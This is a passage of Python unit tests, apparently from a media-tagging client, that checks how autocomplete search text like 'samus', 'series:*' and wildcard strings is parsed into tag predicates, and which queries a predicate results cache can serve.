read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-metroid:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, False ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid', inclusive = False ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid', inclusive = False ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 's*s a*n', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 's*s a*n', 's*s a*n*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( ' samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '[samus]', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, '[samus]' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, '[samus]' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'creator-id:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'creator-id:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, True, True, False, True ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'n*n g*s e*n:as*ka', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 'n*n g*s e*n:as*ka', 'n*n g*s e*n:as*ka*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'system:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
#
#
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = True
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, True, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, True, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
def test_predicate_results_cache_init( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
predicate_results_cache = ClientSearch.PredicateResultsCacheInit()
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
def test_predicate_results_cache_system( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
predicates = [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_INBOX ) ]
predicate_results_cache = ClientSearch.PredicateResultsCacheSystem( predicates )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
def test_predicate_results_cache_subtag_normal( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
#
predicates = [ samus, samus_aran, character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'samus', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus*' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samas br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus ar*' ) ), { samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus aran*' ) ), { samus_aran, character_samus_aran } )
def test_predicate_results_cache_subtag_exact( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ samus ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'samus', True )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus } )
def test_predicate_results_cache_full_normal( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:samus', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'characte:samus aran*' ) ), set() )
def test_predicate_results_cache_namespace_explicit_fetch_all( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'character:*', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
